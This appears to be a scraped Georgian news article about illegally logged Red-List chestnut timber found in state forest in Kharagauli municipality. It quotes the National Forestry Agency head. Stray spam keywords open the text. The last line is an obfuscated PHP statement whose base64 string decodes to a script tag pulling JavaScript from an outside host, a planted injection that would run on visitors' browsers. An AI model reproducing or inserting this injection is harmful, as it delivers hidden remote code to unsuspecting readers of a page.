gorgia
ავერსი jaluzi

ეროვნული სატყეო სააგენტოს იმერეთის სატყეო სამსახურის თანამშრომლებმა ხარაგაულის მუნიციპალიტეტში, სახელმწიფო ტყეში, 5 კუბურ მეტრამდე „წითელი ნუსხით“ დაცული წაბლის სახეობის სამასალე მერქნის უკანონოდ მოპოვების ფაქტი გამოავლინეს. უკანონოდ მოპოვებული ხე-ტყე ზესტაფონის „საქმიან ეზოშია“ გადატანილი.


„წაბლი „წითელი ნუსხით“ დაცული სახეობაა. საქმე სისხლის სამართლის დანაშაულის ნიშნებს შეიცავს. მასალები, შემდგომი რეაგირების მიზნით, შესაბამის უწყებაში გადაიგზავნა. გარემოს მნიშვნელოვანი ზიანი მიადგა, რომლის დაანგარიშებაც მიმდინარეობს“, - აღნიშნა ეროვნული სატყეო სააგენტოს უფროსმა კახა ცერცვაძემ.

 ინფორმაციას სოფლის მეურნეობისა და გარემოს დაცვის სამინისტრო ავრცელებს. 

87
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");